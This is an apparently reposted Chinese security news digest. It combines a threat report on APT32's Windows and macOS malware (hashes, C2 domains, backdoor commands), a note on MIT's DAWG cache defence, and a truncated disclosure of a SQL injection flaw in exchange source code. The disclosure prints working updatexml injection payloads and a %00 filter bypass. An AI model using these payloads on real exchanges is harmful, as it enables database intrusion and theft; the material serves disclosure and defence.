Mordy期刊181020：十月IT界發生了什麼？

MacOS 安全漏洞木馬 · 發表 2018-10-21 18:51:32

摘要： APT32“海蓮花”近期多平臺攻擊活動：熟悉的手段，全新的IOC 注：轉載於freebuf “海蓮花”，又名APT32和OceanLotus，是越南背景的黑客組織。該組織至少自2012年開始活躍，長期針對中國能源相關行業、海事機構、海域建設部門、...

APT32“海蓮花”近期多平臺攻擊活動：熟悉的手段，全新的IOC/">IOC

注：轉載於freebuf

“海蓮花”，又名APT32和OceanLotus，是越南背景的黑客組織。該組織至少自2012年開始活躍，長期針對中國能源相關行業、海事機構、海域建設部門、科研院所和航運企業等進行網路攻擊。除中國外，“海蓮花”的目標還包含全球的政府、軍事機構和大型企業，以及本國的媒體、人權和公民社會等相關的組織和個人。

2017年下半年至今，微步線上釋出了《“海蓮花”團伙的最新動向分析》、《“海蓮花”團伙專用後門Denis最新變種分析》、《微步線上發現“海蓮花”團伙最新macOS後門》和《“海蓮花”團伙本月利用Office漏洞發起高頻攻擊》等多篇報告，披露了APT32的相關攻擊活動。近期，微步線上黑客畫像系統監控到該組織多平臺的攻擊活動，經分析發現：

APT32的攻擊活動仍在持續，近期中國、韓國、美國和柬埔寨等國金融、政府和體育等行業相關目標遭到定向攻擊。

攻擊平臺包含Windows和macOS，攻擊手法相比之前變化不大，除都使用了偽裝Word文件的可執行程式之外，針對Windows平臺的還利用了CVE-2017-11882漏洞。

針對Windows平臺的木馬部分利用了白加黑技術，部分利用了Regsvr32.exe載入執行OCX可執行檔案。此外，相比之前多利用Symantec公司簽名的程式進行白加黑利用來投遞Denis木馬，APT32近期增加了對Intel和Adobe公司簽名程式的白加黑利用。

針對macOS平臺的木馬相較之前其Dropper和Payload加了殼和虛擬機器檢測。

微步線上通過對相關樣本、IP和域名的溯源分析，共提取22條相關IOC，可用於威脅情報檢測。微步線上的威脅情報平臺（TIP）、威脅情報訂閱、API等均已支援此次攻擊事件和團伙的檢測。

詳情

微步線上長期跟蹤全球150多個黑客組織。近期，微步線上監測到APT32針對中國、韓國、美國和柬埔寨等國金融、政府和體育等行業相關目標的多平臺攻擊活動。該組織近期手法與之前相比變化不大，其中針對Windows平臺的攻擊主要利用包含CVE-2017-11882漏洞的doc文件結合白加黑利用和圖示偽裝為Word的RAR自解壓檔案來投遞其特種木馬Denis，針對macOS平臺的亦同樣是將macOS應用程式偽裝為Word文件進行木馬投遞。

與此前一樣，誘餌文件內容都是模糊圖片，例如Scanned Investment Report-July 2018.ⅾocx：

樣本分析

微步線上在8月份監控到多起APT32的攻擊活動，涉及Windows和macOS平臺。相關分析如下：

Windows樣本

漏洞樣本

在Office漏洞利用方面，APT32近期主要利用CVE-2017-11882漏洞投遞Denis木馬。《“海蓮花”團伙本月利用Office漏洞發起高頻攻擊》對CVE-2017-11882漏洞利用做過詳細分析，詳情可查閱相關報告。近期相關的部分漏洞樣本：

SHA256檔名誘餌內容C2攻擊手法

e7f997778ca54b87eb4109d6d4bd5a905e8261ad410a088daec7f3f695bb8189July , 2018.doc模糊圖片ourkekwiciver.comdieordaunt.comstraliaenollma.xyzCVE-2017-11882加Intel白利用

0abe0a3b1fd81272417471e7e5cc489b234a9f84909b019d5f63af702b4058c5FW Report on demonstration of former CNRP in Republic of Korea.doc模糊圖片andreagahuvrauvin.combyronorenstein.comstienollmache.xyzCVE-2017-11882加Adobe白利用

以e7f997778ca54b87eb4109d6d4bd5a905e8261ad410a088daec7f3f695bb8189為例，該樣本在微步線上雲沙箱的分析結果如下圖所示，從“雲沙箱-威脅情報IOC”可發現此樣本相關C2已被識別為APT32所有。

多引擎檢測：

執行流程：

威脅情報IOC

RAR自解壓樣本

APT32經常使用偽裝成Word文件的可執行程式作為投遞木馬的載體，通常還會結合RLO手法迷惑受害者。近期偽裝成Word文件的部分RAR自解壓檔案：

SHA256檔名誘餌內容C2攻擊手法

58e294513641374ff0b42b7c652d3b4a471e8bde8664a79311e4244be0546df4Sum for July 2018.exe模糊圖片andreagbridge.comillagedrivestralia.xyzbyronorenstein.comRAR自解壓，利用regsvr32.exe執行OCX

78a1f6d9b91334e5435a45b4362f508ae27d7ad784b96621d825c2e966d04064feedback, Rally in USA from July 28-29, 2018.exe模糊圖片stienollmache.xyzchristienollmache.xyzlauradesnoyers.comRAR自解壓，利用regsvr32.exe執行OCX

以樣本78a1f6d9b91334e5435a45b4362f508ae27d7ad784b96621d825c2e966d04064為例。使用WinRAR檢視該檔案，可發現該自解壓檔案執行後會通過regsvr32.exe載入執行釋放的OCX可執行檔案，然後開啟誘餌文件迷惑受害者，如下圖：

該樣本在微步線上雲沙箱的分析結果如下圖所示，從“雲沙箱-威脅情報IOC”亦可發現此樣本相關C2已被識別為APT32所有。

執行流程：

威脅情報IOC

macOS樣本

微步線上近期還捕獲了多個APT32針對macOS平臺的特種木馬，下文以“Scanned Investment Report-July 2018.ⅾ[footnoteRef:1]ocx”為例進行分析。

該樣本的基本資訊如下：

檔案型別Zip檔案，macOS app

檔案大小454,967 位元組

檔名Scanned Investment Report-July 2018.ⅾocx

MD5a3d09d969df1742a7cc9511f07e9b44b

SHA101ad8b20337da00d1d458ba93f98dc996a97a71f

SHA25668f7ca2f1fa9f0b5151bec686144eafc13a1e2266dcfc95fafc3104f0a96b802

該樣本為字尾偽裝成為.docx的macOS應用程式，一旦雙擊執行則會執行\Contents\MacOS\下的Scanned Investment Report-July 2018可執行檔案，導致系統被感染。該可執行檔案是一個Dropper，相比此前《微步線上發現“海蓮花”團伙最新macOS後門》中分析的樣本，該Dropper和其釋放的Payload都加了一個簡單的殼，Payload相比之前也增加了虛擬機器檢測。

樣本Scanned Investment Report-July 2018執行後判斷啟動許可權，根據許可權釋放檔案到不同目錄，然後設定隱藏屬性和修改檔案建立時間。其中 mouseevents 和mediaagentd屬同一檔案，為惡意Payload程式，plist檔案的功能是實現對應Payload的開機自啟。

許可權釋放檔案

root/Library/Mouse/Primary/mouseevents/Library/LaunchDaemons/com.apple.mouses.event.plist

非root/Users/boy/Library/Video/Download/Updater/mediaagentd/Users/boy/Library/LaunchAgents/com.apple.media.agentd.plist

修改建立時間相關命令如下：

com.apple.mouses.event.plist被設定為隱藏屬性，其建立時間被修改為2017-11-22 00:33:43，檔案內容如下：

樣本釋放的mouseevents屬後門程式，其核心功能是接受C2控制執行各種操作，具體包含上傳下載和刪除檔案、執行shell命令等等。相關分析如下：

1、mouseevents首先會通過檢測系統資訊來做反虛擬機器檢測。通過內建關鍵字vmware、virtualbox、parallels來檢測程式是否執行在虛擬環境中。使用的shell命令如下：

2、如檢測到執行在虛擬環境中，則通過shell命令刪除其父程式所在的目錄。但有趣的是，即使檢測到自身執行在虛擬機器環境中也不會退出，只會不斷的迴圈檢測執行環境。使用shell命令如下：

3、如檢測到不在虛擬環境中，則會隨機休眠一段時間。

4、然後通過shell命令獲取系統版本、使用者名稱、計算機名和系統架構體系等資訊。相關程式碼和指令如下：

Shell命令功能

ioreg -rd1 -c IOPlatformExpertDevice | awk ‘/IOPlatformSerialNumber/ { split($0, line, \”\\\”\”); printf(\”%s\”, line[4]); }’ 2>&1″獲取IOPlatformUUID

system_profiler SPHardwareDataType 2>/dev/null | awk ‘/Memory/ {split($0,line, \”:\”);獲取系統記憶體大小

sw_vers –productVersion獲取系統版本

uname –m獲取處理器架構

scutil –get ComputerName獲取使用者名稱

5、在獲取系統資訊之後，程式會解密出C2並拼接“/store/ads/modal.css”作為上線的URL，拼接的URL具有一定的欺騙性。上線傳送的內容包含安裝時間、安裝路徑、PID、是否root許可權、Arch、計算機名稱、使用者名稱和系統版本等資訊。

6、該後門內建3個C2域名，執行時按順序請求連線，若連線失敗超過5次，則會解密下一個域名並嘗試連線。如第一個域名就上線成功，則不會解密之後的域名。該樣本內建的C2域名為web.dalalepredaa.com、p12.alerentice.com和rio.imbandaad.com。C2的解密演算法為AES256，解密key如下：

7、程式通過設定一個全域性變數的值來判斷選取哪個域名作為上線域名，通過curl模組傳送網路連線，通過返回值來判斷是否獲取下一個C2。

8、一旦上線成功，程式會在隨機等待一段時間之後向{C2 domain}/appleauth/static/cssj/N252394295/widget/auth/app.css迴圈請求控制指令。

9、通過對C2返回的0x2F開始的0×10個位元組進行rol 2並異或0×13得到控制指令。

10、該後門包含7個控制指令，相關指令和對應功能如下表：

指令功能

0xE8結束自身程序

0xA2將執行控制指令shell命令寫入檔案，執行，並上傳結果

0xAC執行控制指令shell命令，並上傳結果

0x3C下載檔案

0×23同0x3C

0×72上傳檔案

0×48刪除檔案

0×32設定請求超時的時間

0×33獲取檔案資訊

其他不執行有效操作

關聯分析

微步線上威脅情報雲顯示，APT32的攻擊仍在持續，近期中國、韓國、美國和柬埔寨相關目標遭到定向攻擊。以微步線上狩獵系統捕獲的誘餌文件July , 2018.doc為例，該檔案建立時間為2018/08/06，野外發現時間為2018/08/14，結合檔名判斷，該樣本應是在8月中上旬被攻擊者使用。但其最終釋放的後門的C2早已被微步線上識別，這側面體現了威脅情報相較於傳統安全產品的優勢，可以在攻擊者發起攻擊之前就識別其攻擊資產。如下圖：

由於相關誘餌文件內容均為模糊圖片，難以通過文件內容進行受害者分析，此處主要以誘餌檔名結合首次發現地等資訊對受害者進行分析。

誘餌“FW Report on demonstration of former CNRP in Republic of Korea.doc”可譯為“關於在韓國的前CNRP示威活動的第一手報告.doc”。CNRP即柬埔寨救國黨，該黨被柬埔寨最高法院在2017年11月16裁決解散。該黨領袖莫淑華在2018年6月24領導在韓務工人員在韓國首爾舉行示威活動，要求日本不要承認柬埔寨大選（7月29日舉行）結果，以及釋放該黨主席根索卡。由此可推測，此次攻擊的受害者極有可能為柬埔寨政府或關注柬埔寨政事的相關目標。有趣的是，微步線上2017年8月份釋出的報告《“海蓮花”團伙的最新動向分析》曾披露相關針對柬埔寨選舉的攻擊活動，結合此前以2018柬埔寨展望會議為主題的攻擊，說明APT32持續在針對柬埔寨進行定向攻擊。

針對macOS平臺的誘餌名為“Scanned Investment Report-July 2018”，可譯為“掃描的2018年7月投資報告”，疑似針對金融相關目標。

誘餌“feedback, Rally in USA from July 28-29, 2018”，可譯為“從2018年7月28日至29日美國拉力賽的反饋”，疑似針對體育或汽車相關行業目標。

附錄

獲取本次報告IOC請訪問連結： ofollow,noindex">https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=785 。

Intel遲遲未修復熔斷/幽靈漏洞麻省理工給出新方案

Meltdown熔斷、Spectre幽靈兩大安全漏洞的爆出絕對是今年處理器領域最大的噩夢，影響之深遠、波及之廣泛、餘威之延續，在整個產業歷史上都極為罕見。

時至今日， Intel僅僅在剛釋出的第九代酷睿處理器(Coffee Lake-S Refresh)上從硬體底層部分修復了熔斷漏洞 ，其他更多漏洞仍需通過重新整理BIOS、打補丁的方式解決，而且多多少少會影響效能。

接下來將在年底釋出的新一代伺服器平臺Cascade Lake也會是類似的部分硬體修復，而新發的九代酷睿X系列發燒處理器則完全未硬體修復。

Intel修復漏洞的速度如此之慢，主要還是這一波漏洞的變種和影響的產品實在太多，Intel也不得不重新設計部分硬體特性才能完全免疫。

不過，麻省理工學院(MIT)的研究者們近日發表了一篇論文，給Intel指出了一條新的“明路”。

不同於Intel自己用的“快取分配技術”(Cache Allocation Technology/CAT)，麻省理工的研究者們提出了一種名為“動態分配路徑保護”(Dynamically Allocated Way Guard/DAWG)的新技術，利用保護區來分割、隔離記憶體快取，讓攻擊者無從下手，不能再通過快取獲取敏感、隱私資料。

研究者還稱，這種方法 只需對作業系統底層稍作修改即可，無需大動干戈，同時對效能造成的影響也完全在可接受範圍內。

Helm實驗室披露：超過200家交易所使用了這套問題程式碼

近日，HELM區塊鏈安全實驗室在GitHub上發現了一套眾多交易所可能正在使用的通用原始碼，經過分析發現其中存在大量的通用0day漏洞。據我們初步統計，使用此程式碼的交易所超過200家，目前仍存在該漏洞的交易所超過40家。

在與開發商聯絡過後，得知其釋出的演示站是升級過的第二個版本，而新版本雖然已經對該0day進行不完全修復，仍然可以被繞過。為了保證相關交易所的資金安全，HELM區塊鏈安全實驗室對此漏洞以及黑客的攻擊手法進行分析披露，並提供修復方式，希望各大交易所儘快修復漏洞以防患於未然。

這裡我們選擇其中一枚高危漏洞（SQL%E6%B3%A8%E5%85%A5/">SQL注入型別）進行披露，該漏洞可簡單繞過防護，可通過報錯注入獲取資料庫資訊，從而獲得後臺管理許可權；黑客通過操縱使用者資金交易，可導致交易所資金遭受嚴重威脅。此注入點存在於行情頁面中的請求連線（下圖紅框），請各個使用此頁面類似功能的交易所自查。

通過payload：／Chart／＊＊＊＊＊？market＝＇ and updatexml（1，concat（＇～＇，user（），＇～＇），1）－－ a獲取到資料庫連線。

使用者名稱：li＊＊＊＊

連線地址：localhost

在執行獲取表名payload：

／Chart／＊＊＊＊？market＝＇and updatexml（1，concat（＇～＇，（select count（＊） from information＿schema．tables where table＿schema＝database（）），＇～＇），1）－－ a

被攔截。

只需加％00繞過即可，payload：

／Chart／＊＊＊？market＝＇ and updatexml（1，concat（＇～＇，（se％00lect cou％00nt（＊） f％00rom informat％00ion＿schema．tables wh％00ere table＿schema＝database（）），＇～＇），1）－－ a

用burpsuite獲取到表名